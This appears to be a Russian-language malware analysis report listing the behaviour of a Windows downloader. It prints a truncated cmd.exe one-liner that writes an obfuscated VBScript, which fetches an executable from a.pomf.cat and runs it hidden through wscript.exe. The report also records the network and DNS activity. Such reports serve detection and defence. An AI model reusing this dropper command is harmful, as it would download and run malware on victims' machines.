Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO W5l= "http://a.pomf.cat/iugavu.exe">>C9r.VBS &@ECHO A2l = E7a("ddOkbs")>>C9r.VBS &@ECHO Set R2u = CreateObject(E7a("ntynmSOynmiuuq"))>>C9r.VBS &@ECHO R2u.Open E7a("hfu"), W...
- %TEMP%\c9r.vbs
- %TEMP%\c9r.vbs
- 'a.##mf.cat':80
- http://a.##mf.cat/iugavu.exe
- DNS ASK a.##mf.cat
- '<SYSTEM32>\wscript.exe' "%TEMP%\C9r.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO W5l= "http://a.pomf.cat/iugavu.exe">>C9r.VBS &@ECHO A2l = E7a("ddOkbs")>>C9r.VBS &@ECHO Set R2u = CreateObject(E7a("ntynmSOynmiuuq"))>>C9r.VBS &@ECHO R2u.Open E7a("hfu"), W...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13